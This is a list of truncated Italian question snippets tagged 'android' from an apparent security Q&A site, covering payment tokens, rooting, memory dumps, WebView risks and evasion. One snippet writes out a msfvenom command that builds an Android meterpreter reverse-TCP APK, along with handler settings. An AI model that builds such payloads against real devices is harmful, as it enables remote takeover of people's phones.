Domande con tag 'android'

domande con tag
0
risposte

Registrazione della carta di pagamento Android, generazione di token e verifica

Stavo cercando di trovare informazioni su Android Pay e su come gestiscono le informazioni sulla carta quando la aggiungo ad Android Pay e in che modo vengono verificate le informazioni sui token. Non sono riuscito a trovare informazioni dettagl...
posta 08.11.2016 - 19:13
0
risposte

Overflow buffer Rooting vs SU tramite ripristino?

Dopo una ricerca sui processi di root, dettagli e tecniche di basso livello, ho scoperto che accade principalmente attraverso l'overflow del buffer per ottenere l'accesso root tramite il payload (binari) in esecuzione all'indirizzo di memoria di...
posta 11.08.2016 - 03:49
0
risposte

Attenuazione del dump della memoria e analisi di un'applicazione

Ho usato Frida e Fridump per Memory Dump & Stringhe Dump su un dispositivo mobile su cui ho installato un'app per test. Nel file strings.txt che ho estratto usando gli strumenti sopra menzionati, Sono in grado di trovare il token di sessi...
posta 12.09.2016 - 15:02
1
risposta

Rischi per la sicurezza con setDomStorageEnabled (true) in Android?

Quali sono i rischi per la sicurezza associati all'abilitazione del metodo setDomStorageEnabled(true) ? Riferimento.     
posta 08.06.2016 - 10:58
1
risposta

Cancellare Lastpass Premium dal cellulare [duplicato]

Questa mattina ho lasciato cadere il mio telefono LG G4 (Android 6 Marshmallow) e ho distrutto il display. Ho intenzione di acquistare un nuovo telefono splendente e vendere quello vecchio a buon mercato. Io uso Lastpass Premium per archi...
posta 14.06.2016 - 13:55
0
risposte

Possibile potenziale di Dmg dell'attaccante se Lui / Lei può SSH in Android Phone

Di recente ho iniziato a cercare la capacità di SSH in un dispositivo Android. Da quello che ho visto, questa è una sfida finita, che mi fa chiedere quanto danno possa fare un aggressore. Diciamo che un utente malintenzionato sia riuscito a o...
posta 24.05.2016 - 22:34
0
risposte

Android non connesso a kali linux con meterpreter in metasploit

Continuo a riscontrare un errore. Creo un apk: msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 R > test.apk Nella console, configuro il multi / handler: set PAYLOAD android/meterpreter/reverse_tcp set LHOST 10...
posta 09.05.2016 - 18:45
0
risposte

Come "silenziosamente" chiamare una funzione Java per evitare la ricerca di testo?

Supponiamo che io sia un attaccante, voglio chiamare una funzione API da un'app per Android, diciamo Build.getRadioVersion() . Ma voglio mantenere questa chiamata invisibile, cioè non può essere cercata, ad esempio grep getRadioVersion ....
posta 01.05.2016 - 06:52
0
risposte

web view addjavascriptinterface exploit

Ho battuto la testa su questo per quasi 56 ore (+/- un paio che ho preso per avere un paio di sonnellini e RedBulls) e non sono stato in grado di arrivare da nessuna parte con esso finora. Sto cercando di capire l'addjavascriptinterface in We...
posta 23.06.2016 - 19:53
0
risposte

Sono disponibili dump di dispositivi Android da utilizzare come set di dati?

Sono interessato a trovare i dump dei dati del dispositivo Android in modo da utilizzarli nella mia ricerca di dottorato, riguardante l'analisi dei dati. Sono stato in grado di incontrare solo due fonti online; uno di questi non disponibile al m...
posta 22.04.2016 - 13:31